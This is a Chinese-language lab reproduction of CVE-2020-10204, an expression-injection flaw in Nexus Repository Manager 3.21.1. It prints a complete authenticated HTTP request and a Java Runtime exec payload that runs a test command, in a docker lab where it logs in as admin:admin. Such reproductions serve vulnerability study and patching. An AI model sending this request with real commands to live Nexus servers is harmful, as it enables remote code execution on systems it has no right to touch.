Nexus Repository Manager 3 遠端命令執行漏洞(CVE-2020-10204)
阿新 • • 發佈:2022-05-17
Nexus Repository Manager 3 是一款軟體倉庫,可以用來儲存和分發Maven、NuGET等軟體源倉庫。其3.21.1及之前版本中,存在一處任意EL表示式注入漏洞,這個漏洞是CVE-2018-16621的繞過。
參考連結:
- https://support.sonatype.com/hc/en-us/articles/360044356194-CVE-2020-10204-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
- https://github.com/threedr3am/learnjavabug/blob/93d57c4283/nexus/CVE-2020-10204/README.md
漏洞環境
執行如下命令啟動Nexus Repository Manager 3.21.1:
docker-compose up -d
等待一段時間環境才能成功啟動,訪問http://your-ip:8081
即可看到Web頁面。
該漏洞需要訪問更新角色或建立角色介面,所以我們需要使用賬號密碼admin:admin
登入後臺。
漏洞復現
登入後臺後,複製當前Cookie和CSRF Token,傳送如下資料包,即可執行EL表示式:
點選檢視程式碼
POST /service/extdirect HTTP/1.1 Host: 192.168.75.130:8081 Content-Length: 223 X-Requested-With: XMLHttpRequest X-Nexus-UI: true User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 NX-ANTI-CSRF-TOKEN: 0.020684517362389077 Content-Type: application/json Accept: */* Origin: http://192.168.1.3:8081 Referer: http://192.168.1.3:8081/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: NX-ANTI-CSRF-TOKEN=0.020684517362389077; NXSESSIONID=5bca2c1e-15ba-47b8-b638-a0de8da5d164 Connection: close {"action":"coreui_User","method":"update","data":[{"userId":"admin","version":"2","firstName":"admin","lastName":"User","email":"[email protected]","status":"active","roles":["nxadmin$\\B{233*233}"]}],"type":"rpc","tid":11}
參考https://github.com/jas502n/CVE-2020-10199,使用表示式$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}
即可成功執行任意命令:
和POC不一樣的地方就是,把
$\\B{233*233}
替換成
$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}